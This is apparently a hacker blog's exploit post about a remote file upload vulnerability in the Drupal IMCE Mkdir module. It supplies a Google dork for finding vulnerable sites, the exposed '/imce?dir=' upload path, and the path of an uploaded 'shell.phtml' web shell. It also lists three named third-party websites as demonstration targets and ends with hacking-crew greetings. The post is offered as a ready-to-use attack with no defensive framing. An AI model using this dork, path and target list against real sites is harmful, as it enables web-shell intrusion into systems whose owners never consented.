IMCE Mkdir <== Remote File Upload Vulnerability

##################################################
# Exploit Title: IMCE Mkdir <== Remote File Upload Vulnerability
# Date: 27/06/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://drupal.org/project/imce_mkdir
# Google dork: inurl:"/imce?dir=" intitle:"File Browser"
# Tested on: Linux
##################################################
[~]Exploit/p0c :

http://localhost:80/imce?dir=

Shell Access : http://localhost:80/[dir]/dir]/[dir]/shell.phtml

[~]Dem0 :

http://www.arcireal.com/imce?dir=
http://www.la-gerbille.net/imce?dir=
http://ciam.inra.fr/biosp/imce?dir=

FB : www.fb.me/justryuz
+---------------------------------------------------+
  Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza + Turki + GaySec + Xadna ]
-----------------------------------------------------+

Tweet

Postingan terkait:

Ditulis Ryuzaki — Tuesday, June 26, 2012 — Add Comment — exploit, iNFO, sekuriti